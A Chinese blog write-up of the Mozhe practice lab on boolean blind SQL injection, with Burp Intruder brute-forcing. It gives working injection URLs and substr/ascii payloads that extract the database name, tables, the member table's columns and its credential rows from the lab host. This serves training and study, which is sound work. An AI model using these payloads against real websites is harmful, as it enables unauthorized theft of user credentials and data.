墨者 - SQL注入漏洞测试(布尔盲注)

**

一、报数据库名字

**

1.根据浮动的通告进度条,找到sql注入点。
内容不变,判断是数字型注入。

http://219.153.49.228:44199/new_list.php?id=1  and  1=1 --+

2.然后开始判断数据库名字的长度,1,2,3…内容空白。一直试,试到长度为10

http://219.153.49.228:44199/new_list.php?id=1%20%20and%20%20length(database())=10%20--+

3.开始猜测数据库名字:

219.153.49.228:44199/new_list.php?id=1 and  substr(database(),1,1)='s' --+

4.页面返回正常,在这里我们用burp工具进行爆破:
然后将其发送到Intercept模块,Intruder 是burp 套件的优势,他提供一组特别有用的功能。它可以自动实施各种定制攻击,包括资源枚举、数据提取、模糊测试等常见漏洞等。在各种有效的扫描工具中,它能够以最细化、最简单的方式访问它生产的请求与响应,允许组合利用个人智能与该工具的控制优点。
然后进入Intercept模块, b b b,美元符号围起来的就是需要爆破的值:
在这里插入图片描述
Sniper 这种攻击模式可以让我们选择的攻击位置注入一个单一的有效载荷。这需要的有效载荷选项,将它们插入到选定的位置,然后重复,直到它已测试所有的有效载荷选项。如果选择多个位置,它会只适用于测试,一次一个位置。我会告诉你如何使用这个测试在几秒钟之内的SQL 漏洞的迹象

Pitchfork 这种攻击模式允许你测试多种有效载荷,最大能够自定义8 个,基于攻击位置。这种攻击模式设置不同的有效载荷为每个位置逐一同时测试。

Cluster bomb 这种攻击模式使用多种有效载荷,并允许你测试每一个可能有效载荷在每个选择的攻击位置,这意味着接下来的测试,交换任何其他有效载荷。当你有不同需要注射的地方,它将会非常的方便。
在这里插入图片描述

在这里我们使用52个字母字典,进行爆破:
在这里插入图片描述

我们修改substr函数。在这里介绍一下:
substr()函数:
Substr()和substring()函数实现的功能是一样的,均为截取字符串。

string substring(string, start, length)

string substr(string, start, length)

参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。

Sql用例:

(1) substr(DATABASE(),1,1)>’a’,查看数据库名第一位,substr(DATABASE(),2,1)查看数据库名第二位,依次查看各位字符。

(2) substr((SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE T table_schema=0xxxxxxx LIMIT 0,1),1,1)>’a’此处string参数可以为sql语句,可自行构造sql语句进行注入。
爆出第二个字段:
在这里插入图片描述
由此类推了,推出数据库的名字为stormgroup

**

二、爆出表名字

**

然后用new_list.php?id=1 and substr((select table_name from information_schema.tables where table_schema=‘stormgroup’ limit 0,1),1,1))=‘m’ --+,推出表名为member/notice

在这里插入图片描述

随后爆字段,new_list.php?id=1 and length((select column_name from information_schema.columns where table_name='member' and table_schema='stormgroup' limit 0,1))=4 --+  推出字段名字为name,password,status

http://219.153.49.228:44199/new_list.php?id=1%20and%20%20substr((select%20%20column_name%20from%20information_schema.columns%20where%20table_name=%22member%22%20limit%200,1),1,1)%20=%27n%27%20--+

爆字段内容,/new_list.php?id=1 and length((select concat(name) from stormgroup.member limit 1,1))=5 --+ ,先判断内容长度

/new_list.php?id=1 and ascii(substr((select concat(name) from stormgroup.member limit 1,1),1,1))=109,测试其内容。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值